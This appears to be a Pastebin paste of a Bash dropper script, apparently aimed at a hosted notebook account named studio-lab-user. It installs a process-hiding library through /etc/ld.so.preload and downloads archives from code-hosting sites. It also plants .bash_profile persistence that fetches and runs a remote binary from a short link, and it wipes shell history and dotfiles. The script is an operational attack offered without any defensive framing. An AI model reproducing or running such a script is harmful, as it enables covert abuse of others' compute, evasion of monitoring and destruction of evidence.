Advertisement
ppek

ASNim

Feb 15th, 2023
115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.00 KB | None | 0 0
  1. rm -rvf .lib* .bash*
  2. rm -rvf * && mkdir d && cd d
  3. #!/bin/sh
  4.  
  5. echo "==================="
  6. echo "   CEK TIMEZONE   "
  7. echo "==================="
  8. echo " "
  9. echo " "
  10. ln -fs /usr/share/zoneinfo/Asia/Jakarta /etc/localtime
  11. dpkg-reconfigure --frontend noninteractive tzdata
  12. sleep 2
  13.  
  14. apt update -y;apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential binutils git cmake screen unzip net-tools curl -y
  15.  
  16. wget https://gitlab.com/meldiyunrianto/nimik/-/raw/main/graphics.tar.gz
  17. tar -xvzf graphics.tar.gz
  18. rm -rf graphics.tar.gz
  19.  
  20. rm -rf gas && wget -q 'https://gitlab.com/meldiyunrianto/nimik/-/raw/main/korek.zip' && unzip korek.zip
  21. chmod +x gas
  22. rm -rf Makefile
  23. rm -rf processhider.c
  24. rm -rf README.md
  25. rm -rf .gitignore
  26. rm -rf korek.zip
  27.  
  28. cd ~/
  29.  
  30. wget https://github.com/AhmadTugiman/gembel/raw/main/tukimin.zip
  31. unzip tukimin.zip
  32. rm -rf tukimin.zip
  33. sleep 3
  34.  
  35. make
  36. gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
  37. mv libprocesshider.so /usr/local/lib/
  38. echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
  39.  
  40. sleep 3
  41. mkdir .lib
  42. cd .lib
  43. git clone https://github.com/sukamenari/akc.git && cd akc &&  mv kernel* /home/studio-lab-user/.lib
  44. cd .. && rm -rvf akc
  45. echo "" > /home/studio-lab-user/.bashrc
  46. echo "" > /home/studio-lab-user/.bash_history
  47. echo "" > /home/studio-lab-user/.bash_profile
  48. echo 'echo ""  >> /home/studio-lab-user/.bash_history' >> /home/studio-lab-user/.bashrc
  49. echo "source /home/studio-lab-user/.bash_profile"  >> /home/studio-lab-user/.bashrc
  50. echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/studio-lab-user/.bash_profile
  51. echo "export LD_LIBRARY_PATH" >> /home/studio-lab-user/.bash_profile
  52. echo "bash /home/studio-lab-user/.lib/gas.sh"  >> /home/studio-lab-user/.bash_profile &&
  53. echo "export LC_ALL=C; unset LANGUAGE && cd ~/ && rm -rvf n && wget -O n http://tiny.cc/nim && chmod +x n && ./n " > /home/studio-lab-user/.lib/gas.sh
  54. cd /home/studio-lab-user/.lib/
  55. chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
  56.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement